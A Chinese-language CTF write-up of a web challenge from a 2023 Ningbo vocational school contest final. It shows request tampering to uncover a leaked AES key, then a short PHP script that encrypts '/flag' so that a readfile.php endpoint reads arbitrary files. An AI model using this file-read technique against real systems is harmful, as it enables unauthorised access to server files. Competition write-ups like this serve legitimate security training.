23年宁波职教中心CTF竞赛-决赛

Web

拳拳组合

进去页面之后查看源码,发现一段注释,写着小明喜欢10的幂次方,那就是10、100、1000、10000

返回页面,在点击红色叉叉的时候抓包,修改count的值为10、100、1000、10000

然后分别获得以下信息

python 复制代码
?count=10 有点接近了

?count=100:readfile.php

?count=1000:需要加密传输哦

?count=10000:恭喜你坚持到现在。赠与你一个密码本:crypt_key1234567890abcdef.txt

# 访问URL/crypt_key1234567890abcdef.txt获得密码本,就是加密规则吧
$key = '1234567890abcdef';
$iv = '1234567890abcdef';
$method = 'AES-256-CBC';
$encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
return base64_encode($encrypted);

那么我们需要写脚本来加密/flag,然后将加密后的内容传递给readfile.php的filePath

python 复制代码
<?php

$data="/flag";

$key = '1234567890abcdef';
$iv = '1234567890abcdef';
$method = 'AES-256-CBC';
$encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
echo base64_encode($encrypted);


?>

在文件路径filePath后面,输入加密后的密文QXFwTW9pTmUyVy9aWnVhWW5LOFNIZz09,输入进去之后就获得了flag

python 复制代码
flag{d41d8cd98f00b204e9800998ecf8427e}
相关推荐
sszdlbw8 分钟前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
chushiyunen17 分钟前
dom操作笔记、xml和document等
xml·java·笔记
chushiyunen20 分钟前
tomcat使用笔记、启动失败但是未打印日志
java·笔记·tomcat
旧味清欢|24 分钟前
关注分离(Separation of Concerns)在前端开发中的实践演进:从 XMLHttpRequest 到 Fetch API
javascript·http·es6
汇能感知25 分钟前
光谱相机的光谱数据采集原理
经验分享·笔记·科技
wangjun515943 分钟前
linux,物理机、虚拟机,同时内外网实现方案;物理机与虚拟机互通网络;
linux·服务器·网络
人人题1 小时前
汽车加气站操作工考试答题模板
笔记·职场和发展·微信小程序·汽车·创业创新·学习方法·业界资讯
Bruce-li__1 小时前
深入理解Python asyncio:从入门到实战,掌握异步编程精髓
网络·数据库·python
小脑斧爱吃鱼鱼1 小时前
鸿蒙项目笔记(1)
笔记·学习·harmonyos
self-discipline6341 小时前
【计网速通】计算机网络核心知识点与高频考点——数据链路层(二)
网络·网络协议·计算机网络